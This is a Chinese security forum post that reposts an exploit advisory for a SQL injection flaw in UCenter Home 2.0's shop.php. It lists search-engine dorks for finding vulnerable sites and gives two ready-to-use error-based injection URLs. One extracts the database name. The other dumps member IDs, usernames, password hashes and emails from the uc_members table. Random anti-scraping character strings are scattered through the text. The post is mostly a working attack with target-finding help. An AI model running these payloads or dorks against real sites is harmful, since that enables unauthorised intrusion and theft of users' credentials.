找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2172|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
0 {6 ]& I3 \/ ~: h
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  : U& R' l* m/ M' L" j! a4 X1 D

8 n3 \) p3 U* K8 U, [5 A/ t6 L' S8 n                                 . d9 b8 ?' j& {" T! r! f: c# i2 E$ m- B+ a
5 j, x; Y) s- C# l" K
*/ Author : KnocKout  ! @9 l' k( V$ D: c
8 s* M9 z7 Y/ ]% C8 t
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  5 P0 V  z) f  b+ T: Z9 t' I/ m2 ~
/ L. \% ~% u" ?) n0 ~1 F  H; s- K
*/ Contact: knockoutr@msn.com  ( |/ i5 y4 Q, C. \4 a
/ q( s& g6 j: x% K
*/ Cyber-Warrior.org/CWKnocKout  : D. g2 P* ^- M; |

) ^5 v1 O3 f6 r! d8 m__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
" H+ H, V; N) u- T9 P9 N0 T3 G+ A8 f; A/ i3 d0 @- ]" g
Script : UCenter Home  
" [3 W. Q+ G! D& L5 l$ l& E1 |" E* @
Version : 2.0  5 o! u) w% M- r

8 X3 S9 p- t. u4 W/ LScript HomePage : http://u.discuz.net/  5 B# O2 R7 J( U" H
1 t) z# w7 @! h8 m2 M& g! ^
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
# \# [6 R8 y/ F7 h; p1 j* @5 N# S! s/ x6 L4 f3 D+ f% S
Dork : Powered by UCenter inurl:shop.php?ac=view  % n( y6 [  Z* I, q7 Y/ w/ k
/ @: M1 z" F( R
Dork 2 : inurl:shop.php?ac=view&shopid=  
: l! c% C$ Z  q+ V
. n( V7 k" I# G2 N/ D) ^* J. T__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
- q. {9 ~6 g: T+ l$ A  V
0 T1 o, z9 [; g* R) D8 xVuln file : Shop.php  
# ^. H6 i9 U+ U, G
2 M- U. K, u8 r0 y, Lvalue's : (?)ac=view&shopid=  ! v$ S& i1 t0 c/ [- G+ U" F& t, k

! K! m2 n0 u! ~0 N/ P- M1 ]Vulnerable Style : SQL Injection (MySQL Error Based)  4 r4 J% X! x* ]7 u* [
; n3 f! f" e6 b7 g# g
Need Metarials : Hex Conversion  
5 u; C. a5 L7 ]; a6 ^7 x  A  p/ S5 X* g3 A
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  + f4 n. }* i) R. t4 R
1 c  \9 y2 a5 c  e, R- u$ o7 B6 R( f
Your Need victim Database name.   
2 }3 m9 s# P- |" v
0 m1 N. }. ~$ l' `0 C4 B( bfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  7 y  Y# R6 U3 i$ y# g. ?

  h7 H5 ?" c0 q5 b  C..  
8 @2 y! a! e3 y1 g+ g  ~
* V9 }) S& o" k, HDB : Okey.  
" v& K) m1 i3 j4 G( W$ j0 W/ H1 l: ?+ `9 G: T& a9 U* Z9 j* |
your edit DB `[TARGET DB NAME]`  
. `5 n" J" ^" D5 J4 D/ U( S9 F$ `7 |3 n) G, y) @  u
Example : 'hiwir1_ucenter'  1 _9 q4 e) J1 f2 _% A; l
& G4 x$ o  v1 ^4 B
Edit : Okey.  9 G! k/ f# D& q% R' d% t
4 ?* p, R3 Z/ P% m  x3 i; r  {
Your use Hex conversion. And edit Your SQL Injection Exploit..  
3 W% `2 E0 G; B- M7 }
$ a, N6 x+ {+ e   
7 `. i% L4 H" d  n" X! x/ c" f- c1 S+ o
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
: o2 l% U% f. B% {! [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表